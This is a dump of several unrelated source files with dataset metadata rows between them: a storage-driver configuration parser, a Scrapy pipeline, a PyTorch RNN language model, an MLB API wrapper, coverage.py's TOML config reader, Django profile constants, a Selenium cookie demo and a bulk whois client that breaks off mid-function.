self._check_hostname_regex_config(iscsi_info)
setattr(self.conf, 'iscsi_info', iscsi_info)
def _fc_info(self, xml_root):
fc_info = {}
initiators = {}
nodes = xml_root.findall('FC/Initiator')
for node in nodes or []:
if 'Name' in node.attrib:
initiators[node.attrib['Name']] = node.attrib
if 'HostName' in node.attrib:
initiators[node.attrib['HostName']] = node.attrib
if nodes and not initiators:
msg = _("Name or HostName must be set one")
LOG.error(msg)
raise exception.InvalidInput(msg)
fc_info['initiators'] = initiators
self._check_hostname_regex_config(fc_info)
setattr(self.conf, 'fc_info', fc_info)
def _check_hostname_regex_config(self, info):
for item in info['initiators'].keys():
ini = info['initiators'][item]
if ini.get("HostName"):
try:
if ini.get("HostName") == '*':
continue
re.compile(ini['HostName'])
except Exception as err:
msg = _('Invalid initiator configuration. '
'Reason: %s.') % err
LOG.error(msg)
raise exception.InvalidInput(msg)
def _convert_one_iscsi_info(self, ini_text):
# get initiator configure attr list
attr_list = re.split('[{;}]', ini_text)
# get initiator configures
ini = {}
for attr in attr_list:
if not attr:
continue
pair = attr.split(':', 1)
if pair[0] == 'CHAPinfo':
value = pair[1].replace('#', ';', 1)
else:
value = pair[1]
ini[pair[0]] = value
if 'Name' not in ini and 'HostName' not in ini:
msg = _('Name or HostName must be specified for'
' initiator.')
LOG.error(msg)
raise exception.InvalidInput(msg)
return ini
def _parse_remote_initiator_info(self, dev, ini_type):
ini_info = {'default_target_ips': []}
if dev.get('iscsi_default_target_ip'):
ini_info['default_target_ips'] = dev[
'iscsi_default_target_ip'].split(';')
initiators = {}
if ini_type in dev:
# Analyze initiators configure text, convert to:
# [{'Name':'xxx'}, {'Name':'xxx','CHAPinfo':'mm-usr#mm-pwd'}]
ini_list = re.split('\n', dev[ini_type])
for text in ini_list:
ini = self._convert_one_iscsi_info(text.strip())
if 'Name' in ini:
initiators[ini['Name']] = ini
if 'HostName' in ini:
initiators[ini['HostName']] = ini
if ini_list and not initiators:
msg = _("Name or HostName must be set one")
LOG.error(msg)
raise exception.InvalidInput(msg)
ini_info['initiators'] = initiators
self._check_hostname_regex_config(ini_info)
return ini_info
def _hypermetro_devices(self, xml_root):
dev = self.conf.safe_get('hypermetro_device')
config = {}
if dev:
config = {
'san_address': dev['san_address'].split(';'),
'san_user': dev['san_user'],
'san_password': dev['san_password'],
'vstore_name': dev.get('vstore_name'),
'metro_domain': dev['metro_domain'],
'storage_pools': dev['storage_pool'].split(';')[:1],
'iscsi_info': self._parse_remote_initiator_info(
dev, 'iscsi_info'),
'fc_info': self._parse_remote_initiator_info(
dev, 'fc_info'),
'sync_speed': self.conf.hyper_sync_speed,
'metro_sync_completed': dev['metro_sync_completed']
if 'metro_sync_completed' in dev else "True"
}
setattr(self.conf, 'hypermetro', config)
def _replication_devices(self, xml_root):
replication_devs = self.conf.safe_get('replication_device')
config = {}
if replication_devs:
dev = replication_devs[0]
config = {
'backend_id': dev['backend_id'],
'san_address': dev['san_address'].split(';'),
'san_user': dev['san_user'],
'san_password': dev['san_password'],
'vstore_name': dev.get('vstore_name'),
'storage_pools': dev['storage_pool'].split(';')[:1],
'iscsi_info': self._parse_remote_initiator_info(
dev, 'iscsi_info'),
'fc_info': self._parse_remote_initiator_info(
dev, 'fc_info'),
'sync_speed': self.conf.replica_sync_speed,
}
setattr(self.conf, 'replication', config)
def _lun_copy_speed(self, xml_root):
text = xml_root.findtext('LUN/LUNCopySpeed')
if text and text.strip() not in constants.LUN_COPY_SPEED_TYPES:
msg = (_("Invalid LUNCopySpeed '%(text)s', LUNCopySpeed must "
"be between %(low)s and %(high)s.")
% {"text": text, "low": constants.LUN_COPY_SPEED_LOW,
"high": constants.LUN_COPY_SPEED_HIGHEST})
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
if not text:
speed = constants.LUN_COPY_SPEED_MEDIUM
else:
speed = text.strip()
setattr(self.conf, 'lun_copy_speed', int(speed))
def _lun_copy_mode(self, xml_root):
clone_mode = constants.DEFAULT_CLONE_MODE
text = xml_root.findtext('LUN/LUNCloneMode')
if text:
clone_mode = text.strip()
if clone_mode not in constants.SUPPORT_CLONE_MODE:
msg = _("%(array)s array requires %(valid)s lun type, "
"but %(conf)s is specified."
) % {'array': self.conf.san_product,
'valid': constants.SUPPORT_CLONE_MODE,
'conf': clone_mode}
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
setattr(self.conf, 'clone_mode', clone_mode)
def _hyper_pair_sync_speed(self, xml_root):
text = xml_root.findtext('LUN/HyperSyncSpeed')
if text and text.strip() not in constants.HYPER_SYNC_SPEED_TYPES:
msg = (_("Invalid HyperSyncSpeed '%(text)s', HyperSyncSpeed must "
"be between %(low)s and %(high)s.")
% {"text": text, "low": constants.HYPER_SYNC_SPEED_LOW,
"high": constants.HYPER_SYNC_SPEED_HIGHEST})
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
if not text:
speed = constants.HYPER_SYNC_SPEED_MEDIUM
else:
speed = text.strip()
setattr(self.conf, 'hyper_sync_speed', int(speed))
def _hyper_enforce_multipath(self, xml_root):
enforce_multipath_for_hypermetro = True
text = xml_root.findtext('LUN/HyperEnforceMultipath')
if text:
if text.lower().strip() in ('true', 'false'):
if text.lower().strip() == 'false':
enforce_multipath_for_hypermetro = False
else:
msg = _("HyperEnforceMultipath configured error, "
"HyperEnforceMultipath is %s.") % text
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
setattr(self.conf, 'enforce_multipath_for_hypermetro',
enforce_multipath_for_hypermetro)
def _replication_pair_sync_speed(self, xml_root):
text = xml_root.findtext('LUN/ReplicaSyncSpeed')
if text and text.strip() not in constants.HYPER_SYNC_SPEED_TYPES:
msg = (_("Invalid ReplicaSyncSpeed '%(text)s', ReplicaSyncSpeed "
"must be between %(low)s and %(high)s.")
% {"text": text, "low": constants.REPLICA_SYNC_SPEED_LOW,
"high": constants.REPLICA_SYNC_SPEED_HIGHEST})
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
if not text:
speed = constants.REPLICA_SYNC_SPEED_MEDIUM
else:
speed = text.strip()
setattr(self.conf, 'replica_sync_speed', int(speed))
def _lun_copy_wait_interval(self, xml_root):
text = xml_root.findtext('LUN/LUNcopyWaitInterval')
if text and not text.isdigit():
msg = (_("Invalid LUN_Copy_Wait_Interval '%s', "
"LUN_Copy_Wait_Interval must be a digit.")
% text)
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
interval = text.strip() if text else constants.DEFAULT_WAIT_INTERVAL
setattr(self.conf, 'lun_copy_wait_interval', int(interval))
def _lun_timeout(self, xml_root):
text = xml_root.findtext('LUN/Timeout')
if text and not text.isdigit():
msg = (_("Invalid LUN timeout '%s', LUN timeout must be a digit.")
% text)
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
interval = text.strip() if text else constants.DEFAULT_WAIT_TIMEOUT
setattr(self.conf, 'lun_timeout', int(interval))
def _get_minimum_fc_initiator(self, xml_root):
text = xml_root.findtext('FC/MinOnlineFCInitiator')
minimum_fc_initiator = constants.DEFAULT_MINIMUM_FC_INITIATOR_ONLINE
if text and not text.isdigit():
msg = (_("Invalid FC MinOnlineFCInitiator '%s', "
"MinOnlineFCInitiator must be a digit.") % text)
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
if text and text.strip() and text.strip().isdigit():
try:
minimum_fc_initiator = int(text.strip())
except Exception as err:
msg = (_("Minimum FC initiator number %(num)s is set"
" too large, reason is %(err)s")
% {"num": text.strip(), "err": err})
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
setattr(self.conf, 'min_fc_ini_online',
minimum_fc_initiator)
def _rollback_speed(self, xml_root):
text = xml_root.findtext('LUN/SnapshotRollbackSpeed')
if text and text.strip() not in constants.SNAPSHOT_ROLLBACK_SPEED_TYPES:
msg = (_("Invalid SnapshotRollbackSpeed '%(text)s', "
"SnapshotRollbackSpeed must "
"be between %(low)s and %(high)s.")
% {"text": text,
"low": constants.SNAPSHOT_ROLLBACK_SPEED_LOW,
"high": constants.SNAPSHOT_ROLLBACK_SPEED_HIGHEST})
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
if not text:
speed = constants.SNAPSHOT_ROLLBACK_SPEED_HIGH
else:
speed = text.strip()
setattr(self.conf, 'rollback_speed', int(speed))
| 38.910053 | 80 | 0.573339 |
4a1e31a3749acfbe9a253cef39f3e601664ff42c | 896 | py | Python | WikiScraper/WikiScraper/pipelines.py | TobiOnabolu/WebScrapers | 1ff55e6c756303f265917274c16638af4cde5d05 | [
"MIT"
] | null | null | null | WikiScraper/WikiScraper/pipelines.py | TobiOnabolu/WebScrapers | 1ff55e6c756303f265917274c16638af4cde5d05 | [
"MIT"
] | null | null | null | WikiScraper/WikiScraper/pipelines.py | TobiOnabolu/WebScrapers | 1ff55e6c756303f265917274c16638af4cde5d05 | [
"MIT"
] | null | null | null | # Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
# useful for handling different item types with a single interface
from itemadapter import ItemAdapter
from scrapy.exceptions import DropItem
#pipelines used for cleaning your item data records after scraping
#makes it easier than doing seperate cleaning for each crawler
class WikiscraperPipeline:
def process_item(self, item, spider):
#spider.logger.info('A response from just arrived!')
#drop item if one of the fields is missing
if not item['lastupdated'] or not item['url'] or not item['name'] or not item['league']:
raise DropItem("Missing Field") #from scrapy, used to drop a record
return item
#have seperate pipeline classes for each specific thing u want to do
| 35.84 | 96 | 0.741071 |
4a1e321d24f9266ba328c1020e565d9f0c014761 | 5,446 | py | Python | model.py | Adversarial-dropout-rnn/adversarial_dropout_lm | e08ff9aa51765fff6cfac4c2576e58bee3fcd173 | [
"BSD-3-Clause"
] | null | null | null | model.py | Adversarial-dropout-rnn/adversarial_dropout_lm | e08ff9aa51765fff6cfac4c2576e58bee3fcd173 | [
"BSD-3-Clause"
] | null | null | null | model.py | Adversarial-dropout-rnn/adversarial_dropout_lm | e08ff9aa51765fff6cfac4c2576e58bee3fcd173 | [
"BSD-3-Clause"
] | null | null | null | import torch
import torch.nn as nn
from torch.autograd import Variable
from embed_regularize import embedded_dropout_mask
from locked_dropout import LockedDropoutMask
from weight_drop import WeightDropMask
from pytorch_LSTM import LSTM, LSTMCell, BNLSTMCell
class RNNModel(nn.Module):
"""Container module with an encoder, a recurrent module, and a decoder."""
def __init__(self, rnn_type, ntoken, ninp, nhid, nlayers, dropout=0.5, dropouth=0.5, dropouti=0.5, dropoute=0.1, wdrop=0, tie_weights=False):
super(RNNModel, self).__init__()
self.lockdrop = LockedDropoutMask()
self.idrop = nn.Dropout(dropouti)
self.hdrop = nn.Dropout(dropouth)
self.drop = nn.Dropout(dropout)
self.encoder = nn.Embedding(ntoken, ninp)
assert rnn_type in ['LSTM', 'QRNN'], 'RNN type is not supported'
if rnn_type == 'LSTM':
#self.rnns = [torch.nn.LSTM(ninp if l == 0 else nhid, nhid if l != nlayers - 1 else ninp, 1, dropout=0) if l != nlayers-1
# else LSTM(LSTMCell, ninp if l == 0 else nhid, nhid if l != nlayers - 1 else ninp, num_layers=1, dropout=0) for l in range(nlayers)]
self.rnns = [torch.nn.LSTM(ninp if l == 0 else nhid, nhid if l != nlayers - 1 else ninp, 1, dropout=0) for l in range(nlayers)]
if wdrop:
self.rnns = [WeightDropMask(self.rnns[l], ['weight_hh_l0'], dropout=wdrop) for l in range(nlayers)]
elif rnn_type == 'QRNN':
from torchqrnn import QRNNLayer
self.rnns = [QRNNLayer(input_size=ninp if l == 0 else nhid, hidden_size=nhid if l != nlayers - 1 else ninp, save_prev_x=True, zoneout=0, window=2 if l == 0 else 1, output_gate=True) for l in range(nlayers)]
for rnn in self.rnns:
rnn.linear = WeightDropMask(rnn.linear, ['weight'], dropout=wdrop)
print(self.rnns)
self.rnns = torch.nn.ModuleList(self.rnns)
self.decoder = nn.Linear(nhid, ntoken)
# Optionally tie weights as in:
# "Using the Output Embedding to Improve Language Models" (Press & Wolf 2016)
# https://arxiv.org/abs/1608.05859
# and
# "Tying Word Vectors and Word Classifiers: A Loss Framework for Language Modeling" (Inan et al. 2016)
# https://arxiv.org/abs/1611.01462
if tie_weights:
#if nhid != ninp:
# raise ValueError('When using the tied flag, nhid must be equal to emsize')
self.decoder.weight = self.encoder.weight
self.init_weights()
self.rnn_type = rnn_type
self.ninp = ninp
self.nhid = nhid
self.nlayers = nlayers
self.dropout = dropout
self.dropouti = dropouti
self.dropouth = dropouth
self.dropoute = dropoute
def reset(self):
if self.rnn_type == 'QRNN': [r.reset() for r in self.rnns]
def init_weights(self):
initrange = 0.1
self.encoder.weight.data.uniform_(-initrange, initrange)
self.decoder.bias.data.fill_(0)
self.decoder.weight.data.uniform_(-initrange, initrange)
def forward(self, input, hidden, return_h=False, maske=None, maski=None, maskh=None, maskw=None, masko=None):
emb = embedded_dropout_mask(self.encoder, input, maske, dropout=self.dropoute, training=self.training)
emb = self.lockdrop(emb, maski, self.dropouti)
raw_output = emb
new_hidden = []
raw_outputs = []
outputs = []
if maskh is None: maskh = [None for l in range(0, self.nlayers - 1)]
if maskw is None: maskw = [None for l in range(0, self.nlayers)]
for l, rnn in enumerate(self.rnns):
current_input = raw_output
#print(l)
#print(rnn)
raw_output, new_h = rnn(maskw[l], raw_output, hidden[l])
new_hidden.append(new_h)
raw_outputs.append(raw_output)
if l != self.nlayers - 1:
#self.hdrop(raw_output)
raw_output = self.lockdrop(raw_output, maskh[l], self.dropouth)
outputs.append(raw_output)
hidden = new_hidden
output = self.lockdrop(raw_output, masko, self.dropout)
outputs.append(output)
decoded = self.decoder(output.view(output.size(0)*output.size(1), output.size(2)))
result = decoded.view(output.size(0), output.size(1), decoded.size(1))
if return_h:
return result, hidden, raw_outputs, outputs
return result, hidden
def zero_grads(self):
"""Sets gradients of all model parameters to zero."""
for p in self.parameters():
if p.grad is not None:
p.grad.data.zero_()
def init_hidden(self, bsz):
weight = next(self.parameters()).data
if self.rnn_type == 'LSTM':
return [(Variable(weight.new(1, bsz, self.nhid if l != self.nlayers - 1 else self.ninp).zero_()),
Variable(weight.new(1, bsz, self.nhid if l != self.nlayers - 1 else self.ninp).zero_()))
for l in range(self.nlayers)]
elif self.rnn_type == 'QRNN':
return [Variable(weight.new(1, bsz, self.nhid if l != self.nlayers - 1 else self.ninp).zero_())
for l in range(self.nlayers)]
| 46.547009 | 219 | 0.598972 |
4a1e322073ecd5b9ab934106b3ebd6678898f2f9 | 2,685 | py | Python | mlbapi/data/league.py | trevor-viljoen/mlbapi | f674e6ee0cf4d148e491ebac60382f2461ec4397 | [
"MIT"
] | 9 | 2020-02-25T15:51:00.000Z | 2021-12-30T05:22:06.000Z | mlbapi/data/league.py | trevor-viljoen/mlbapi | f674e6ee0cf4d148e491ebac60382f2461ec4397 | [
"MIT"
] | 1 | 2020-07-26T16:00:48.000Z | 2020-07-26T16:05:00.000Z | mlbapi/data/league.py | trevor-viljoen/mlbapi | f674e6ee0cf4d148e491ebac60382f2461ec4397 | [
"MIT"
] | 1 | 2021-02-21T17:29:48.000Z | 2021-02-21T17:29:48.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""mlbapi functions for the league API endpoints.
This module's functions get the JSON payloads for the mlb.com games API
endpoints.
.. _Google Python Style Guide:
http://google.github.io/styleguide/pyguide.html
"""
from mlbapi.data import request
from mlbapi import endpoint
def get_league(league_id, **kwargs):
"""This endpoint allows you to pull the information for a league.
Args:
league_id (int): Unique League Identifier
params (dict): Contains the league_ids, season, seasons, expand, and
fields parameters described below.
params:
league_id (required)
Description: Unique League Identifier
Parameter Type: path
Data Type: integer
league_ids
Description: Comma delimited list of League IDs.
Format: 1234, 2345
Parameter Type: query
Data Type: array[integer]
season
Description: Season of play
Parameter Type: query
Data Type: string
seasons
Description: Seasons of play
Parameter Type: query
Data Type: array[string]
expand
Description: ?
Parameter type: query
Data Type: array[string]
fields
Description: Comma delimited list of specific fields to be returned.
Format: topLevelNode, childNode, attribute
Parameter Type: query
Data Type: array[string]
Returns:
json
"""
return request(endpoint.LEAGUE, primary_key=league_id, **kwargs)
def get_league_all_stars(league_id, write_ins=False, **kwargs):
"""This endpoint allows you to pull the all star ballots for a given league.
Args:
league_id (int): Unique League Identifier
params (dict): Contains the group, and fields parameters described
below.
params:
league_id (required)
Description: Unique Player Identifier
Parameter Type: path
Data Type: integer
league_ids
Description: Comma delimited list of League IDs.
Format: 1234, 2345
Parameter Type: query
Data Type: array[integer]
season
Description: Season of play
Parameter Type: query
Data Type: string
fields
Description: Comma delimited list of specific fields to be returned.
Format: topLevelNode, childNode, attribute
Parameter Type: query
Data Type: array[string]
Returns:
json
"""
if write_ins:
context = 'allStarWriteIns'
else:
context = 'allStarFinalVote'
return request(endpoint.LEAGUE, context, primary_key=league_id, **kwargs)
| 29.505495 | 80 | 0.649534 |
4a1e322c5fdd41b58eb5449d8251c9bf556a1966 | 5,733 | py | Python | coverage/tomlconfig.py | timofurrer/coveragepy | 72e9761ee79eb2f5b61b21a5427e07fff6acd400 | [
"Apache-2.0"
] | 2,254 | 2015-01-05T01:28:03.000Z | 2022-03-29T10:37:10.000Z | coverage/tomlconfig.py | mgorny/coveragepy | 73ca4596fc8eed9c76714e7a5c80dd61d71fe1b1 | [
"Apache-2.0"
] | 707 | 2015-02-07T01:32:02.000Z | 2022-03-31T18:00:14.000Z | coverage/tomlconfig.py | sitedata/coveragepy | e4f0f9ee71a1ade66b51ec53d0061f462e3838cb | [
"Apache-2.0"
] | 439 | 2015-01-16T15:06:08.000Z | 2022-03-30T06:19:12.000Z | # Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://github.com/nedbat/coveragepy/blob/master/NOTICE.txt
"""TOML configuration support for coverage.py"""
import configparser
import os
import re
from coverage.exceptions import CoverageException
from coverage.misc import import_third_party, substitute_variables
# TOML support is an install-time extra option. (Import typing is here because
# import_third_party will unload any module that wasn't already imported.
# tomli imports typing, and if we unload it, later it's imported again, and on
# Python 3.6, this causes infinite recursion.)
import typing # pylint: disable=unused-import, wrong-import-order
tomli = import_third_party("tomli")
class TomlDecodeError(Exception):
"""An exception class that exists even when toml isn't installed."""
pass
class TomlConfigParser:
"""TOML file reading with the interface of HandyConfigParser."""
# This class has the same interface as config.HandyConfigParser, no
# need for docstrings.
# pylint: disable=missing-function-docstring
def __init__(self, our_file):
self.our_file = our_file
self.data = None
def read(self, filenames):
# RawConfigParser takes a filename or list of filenames, but we only
# ever call this with a single filename.
assert isinstance(filenames, (bytes, str, os.PathLike))
filename = os.fspath(filenames)
try:
with open(filename, encoding='utf-8') as fp:
toml_text = fp.read()
except OSError:
return []
if tomli is not None:
toml_text = substitute_variables(toml_text, os.environ)
try:
self.data = tomli.loads(toml_text)
except tomli.TOMLDecodeError as err:
raise TomlDecodeError(str(err)) from err
return [filename]
else:
has_toml = re.search(r"^\[tool\.coverage\.", toml_text, flags=re.MULTILINE)
if self.our_file or has_toml:
# Looks like they meant to read TOML, but we can't read it.
msg = "Can't read {!r} without TOML support. Install with [toml] extra"
raise CoverageException(msg.format(filename))
return []
def _get_section(self, section):
"""Get a section from the data.
Arguments:
section (str): A section name, which can be dotted.
Returns:
name (str): the actual name of the section that was found, if any,
or None.
data (str): the dict of data in the section, or None if not found.
"""
prefixes = ["tool.coverage."]
if self.our_file:
prefixes.append("")
for prefix in prefixes:
real_section = prefix + section
parts = real_section.split(".")
try:
data = self.data[parts[0]]
for part in parts[1:]:
data = data[part]
except KeyError:
continue
break
else:
return None, None
return real_section, data
def _get(self, section, option):
"""Like .get, but returns the real section name and the value."""
name, data = self._get_section(section)
if data is None:
raise configparser.NoSectionError(section)
try:
return name, data[option]
except KeyError as exc:
raise configparser.NoOptionError(option, name) from exc
def has_option(self, section, option):
_, data = self._get_section(section)
if data is None:
return False
return option in data
def has_section(self, section):
name, _ = self._get_section(section)
return name
def options(self, section):
_, data = self._get_section(section)
if data is None:
raise configparser.NoSectionError(section)
return list(data.keys())
def get_section(self, section):
_, data = self._get_section(section)
return data
def get(self, section, option):
_, value = self._get(section, option)
return value
def _check_type(self, section, option, value, type_, type_desc):
if not isinstance(value, type_):
raise ValueError(
'Option {!r} in section {!r} is not {}: {!r}'
.format(option, section, type_desc, value)
)
def getboolean(self, section, option):
name, value = self._get(section, option)
self._check_type(name, option, value, bool, "a boolean")
return value
def getlist(self, section, option):
name, values = self._get(section, option)
self._check_type(name, option, values, list, "a list")
return values
def getregexlist(self, section, option):
name, values = self._get(section, option)
self._check_type(name, option, values, list, "a list")
for value in values:
value = value.strip()
try:
re.compile(value)
except re.error as e:
raise CoverageException(f"Invalid [{name}].{option} value {value!r}: {e}") from e
return values
def getint(self, section, option):
name, value = self._get(section, option)
self._check_type(name, option, value, int, "an integer")
return value
def getfloat(self, section, option):
name, value = self._get(section, option)
if isinstance(value, int):
value = float(value)
self._check_type(name, option, value, float, "a float")
return value
| 34.745455 | 97 | 0.60771 |
4a1e3262e21baf5ae4bb27052fd91b8c3a2f70e8 | 1,943 | py | Python | profiles/constants.py | mitodl/bootcamp-ecommerce | ba7d6aefe56c6481ae2a5afc84cdd644538b6d50 | [
"BSD-3-Clause"
] | 2 | 2018-06-20T19:37:03.000Z | 2021-01-06T09:51:40.000Z | profiles/constants.py | mitodl/bootcamp-ecommerce | ba7d6aefe56c6481ae2a5afc84cdd644538b6d50 | [
"BSD-3-Clause"
] | 1,226 | 2017-02-23T14:52:28.000Z | 2022-03-29T13:19:54.000Z | profiles/constants.py | mitodl/bootcamp-ecommerce | ba7d6aefe56c6481ae2a5afc84cdd644538b6d50 | [
"BSD-3-Clause"
] | 3 | 2017-03-20T03:51:27.000Z | 2021-03-19T15:54:31.000Z | """User constants"""
import pycountry
USERNAME_MAX_LEN = 30
# Defined in edX Profile model
MALE = "m"
FEMALE = "f"
OTHER = "o"
GENDER_CHOICES = (
(MALE, "Male"),
(FEMALE, "Female"),
(OTHER, "Other/Prefer Not to Say"),
)
COMPANY_SIZE_CHOICES = (
(None, "----"),
(1, "Small/Start-up (1+ employees)"),
(9, "Small/Home office (1-9 employees)"),
(99, "Small (10-99 employees)"),
(999, "Small to medium-sized (100-999 employees)"),
(9999, "Medium-sized (1000-9999 employees)"),
(10000, "Large Enterprise (10,000+ employees)"),
(0, "Other (N/A or Don't know)"),
)
YRS_EXPERIENCE_CHOICES = (
(None, "----"),
(2, "Less than 2 years"),
(5, "2-5 years"),
(10, "6 - 10 years"),
(15, "11 - 15 years"),
(20, "16 - 20 years"),
(21, "More than 20 years"),
(0, "Prefer not to say"),
)
HIGHEST_EDUCATION_CHOICES = (
(None, "----"),
("Doctorate", "Doctorate"),
("Master's or professional degree", "Master's or professional degree"),
("Bachelor's degree", "Bachelor's degree"),
("Associate degree", "Associate degree"),
("Secondary/high school", "Secondary/high school"),
(
"Junior secondary/junior high/middle school",
"Junior secondary/junior high/middle school",
),
("Elementary/primary school", "Elementary/primary school"),
("No formal education", "No formal education"),
("Other education", "Other education"),
)
COUNTRIES_REQUIRING_POSTAL_CODE = (
pycountry.countries.get(alpha_2="US"),
pycountry.countries.get(alpha_2="CA"),
)
ALUM_LEARNER_EMAIL = "Learner Email"
ALUM_BOOTCAMP_NAME = "Bootcamp Name"
ALUM_BOOTCAMP_RUN_TITLE = "Bootcamp Run Title"
ALUM_BOOTCAMP_START_DATE = "Bootcamp Start Date"
ALUM_BOOTCAMP_END_DATE = "Bootcamp End Date"
ALUM_HEADER_FIELDS = [
ALUM_LEARNER_EMAIL,
ALUM_BOOTCAMP_NAME,
ALUM_BOOTCAMP_RUN_TITLE,
ALUM_BOOTCAMP_START_DATE,
ALUM_BOOTCAMP_END_DATE,
]
| 26.616438 | 75 | 0.640762 |
4a1e3290c3678e81940752e2311113d781615683 | 179 | py | Python | concrete/common/values/__init__.py | iciac/concrete-numpy | debf888e9281263b731cfc4b31feb5de7ec7f47a | [
"FTL"
] | 96 | 2022-01-12T15:07:50.000Z | 2022-03-16T04:00:09.000Z | concrete/common/values/__init__.py | iciac/concrete-numpy | debf888e9281263b731cfc4b31feb5de7ec7f47a | [
"FTL"
] | 10 | 2022-02-04T16:26:37.000Z | 2022-03-25T14:08:01.000Z | concrete/common/values/__init__.py | iciac/concrete-numpy | debf888e9281263b731cfc4b31feb5de7ec7f47a | [
"FTL"
] | 8 | 2022-01-12T15:07:55.000Z | 2022-03-05T00:46:16.000Z | """Module for value structures."""
from . import tensors
from .base import BaseValue
from .tensors import ClearScalar, ClearTensor, EncryptedScalar, EncryptedTensor, TensorValue
| 29.833333 | 92 | 0.804469 |
4a1e3357d3d11268d8d321aa700bf68d47d3e163 | 366 | py | Python | python-spider/selenium-demo/cookies_demo.py | meteor1993/python-learning | 4ee574c9360caf6e63bb6ee2ef31fa6a9918fa40 | [
"MIT"
] | 83 | 2019-10-15T06:54:06.000Z | 2022-03-28T14:08:21.000Z | python-spider/selenium-demo/cookies_demo.py | wenxuefeng3930/python-learning | 4ee574c9360caf6e63bb6ee2ef31fa6a9918fa40 | [
"MIT"
] | 1 | 2020-04-16T08:13:19.000Z | 2020-07-14T01:52:46.000Z | python-spider/selenium-demo/cookies_demo.py | wenxuefeng3930/python-learning | 4ee574c9360caf6e63bb6ee2ef31fa6a9918fa40 | [
"MIT"
] | 74 | 2019-11-02T08:10:36.000Z | 2022-02-19T12:23:36.000Z | from selenium import webdriver
browser = webdriver.Chrome()
browser.get('https://www.geekdigging.com/')
# 获取 cookies
print(browser.get_cookies())
# 添加一个 cookie
browser.add_cookie({'name': 'name', 'domain': 'www.geekdigging.com', 'value': 'geekdigging'})
print(browser.get_cookies())
# 删除所有 cookie
browser.delete_all_cookies()
print(browser.get_cookies()) | 30.5 | 94 | 0.73224 |
4a1e33b5fe9f89c1d74c47c4ab205543493541df | 6,228 | py | Python | deb_dist/bulkwhois-0.2.1/debian/python-bulkwhois/usr/share/pyshared/bulkwhois/__init__.py | csirtfoundry/BulkWhois | b0ac5ae340d582fed67e75214350cf2702529c5a | [
"MIT"
] | 5 | 2017-05-13T22:51:01.000Z | 2020-12-13T14:01:17.000Z | deb_dist/bulkwhois-0.2.1/build/lib.linux-x86_64-2.6/bulkwhois/__init__.py | csirtfoundry/BulkWhois | b0ac5ae340d582fed67e75214350cf2702529c5a | [
"MIT"
] | 1 | 2020-02-26T10:27:12.000Z | 2020-02-26T10:27:12.000Z | deb_dist/bulkwhois-0.2.1/debian/python-bulkwhois/usr/share/pyshared/bulkwhois/__init__.py | csirtfoundry/BulkWhois | b0ac5ae340d582fed67e75214350cf2702529c5a | [
"MIT"
] | 3 | 2017-07-07T15:59:20.000Z | 2022-01-23T11:09:11.000Z | __all__ = ('BulkWhois')
import telnetlib
import socket
import logging
class BulkWhois(object):
"""
Query a list of IP addresses from a bulk whois server. This is an
efficient way to query a large number of IP addresses. It sends all
the IP addresses at once, and receives all whois results together.
This module takes the approach that you know what you're doing: if
you have non-IP data in there (such as hostnames), the whois server
will ignore them and they won't be included in results.
This class is not designed to be called directly: rather, use one of
the subclass interfaces to specific bulk whois servers such as
bulkwhois.cymru or bulkwhois.shadowserver, which are set to appropriate
default settings for those services.
Usage:
import BulkWhois from bulkwhois
bw = BulkWhois()
records = lookup_ips(["192.168.0.1", "10.1.1.1"])
Args:
leader: Any text that needs to appear before the bulk whois query
footer: Any text that needs to appear after the bulk whois query
server: the hostname of the whois server to use
port: the whois server port number to connect to
record_delim: the char to split records received from the server
who
field_delim: the char to split individual fields in each record
has_results_header: set to True if the whois server send a header
line in the results which has no whois data
fields: a list defining the order of the names of the fields
returned by the server. Used to populate the dict returned.
"""
leader = ""
footer = ""
server = ""
port = -1
record_delim = ""
field_delim = ""
has_result_header = False
field_names = []
def __init__(self,
leader="begin",
footer="end",
server="asn.shadowserver.org",
port="43",
record_delim="\n",
field_delim="|",
has_result_header=False):
self.leader = leader
self.footer = footer
self.server = server
self.port = port
self.record_delim = record_delim
self.field_delim = field_delim
self.has_result_header = has_result_header
def _lookup(self, ip_list):
"""
Take a list of IP addresses, format them according to the
whois server spec, connect on the specified port, send the
formatted data, return the data received.
Raises:
IOError on any connection problems
"""
result = ""
ip_list = self._filter_ipv4(ip_list)
query = self._format_list(ip_list)
try:
tn = telnetlib.Telnet(self.server, self.port)
tn.write(query)
result = tn.read_all()
tn.close()
except socket.gaierror as se:
raise IOError("Couldn't connect to %s:%s" % (self.server,
self.port))
except EOFError as ee:
raise IOError("Server dropped connection")
return result
def lookup_ips_raw(self, ip_list):
"""
Get the raw output returned by the whois server as a string.
"""
return self._lookup(ip_list)
def lookup_ips(self, ip_list):
"""
Return a dict of dicts indexed by IP address with whois
results.
Ensure that the "ip" field exists in the field_names array in the
position of the IP address.
Args:
ip_list: an array of IP addresses. We don't check that
the IP addresses are valid: the whois server will not return
a result for invalid addresses.
Returns:
A dict mapping records by IP address. Dict fields are named
according to the fields_name array.
Raises:
ValueError is "ip" field is not set in field_names.
"""
raw = self._lookup(ip_list)
records = {}
ip_index = self.field_names.index("ip")
if "ip" not in self.field_names:
raise ValueError("You need to include an 'ip' field in the field_names array.")
for line_num, line in enumerate(raw.split(self.record_delim)):
# some whois results have a header we'll throw away
if line_num == 0 and self.has_result_header:
next
fields = line.split(self.field_delim)
# lots of fields space padded
fields = [field.strip() for field in fields]
if len(fields) < len(self.field_names):
# skip this line: malformed, or doesn't match out template
pass
else:
records.setdefault(fields[ip_index], dict(zip(self.field_names, fields)))
return records
def _filter_ipv4(self, ip_list):
clean_ips = []
for ip in ip_list:
try:
socket.inet_pton(socket.AF_INET, ip)
except socket.error:
logging.info("'%s' isn't an IPv4 address: ignoring" % str(ip))
else:
clean_ips.append(ip)
return clean_ips
def _format_list(self, ip_list):
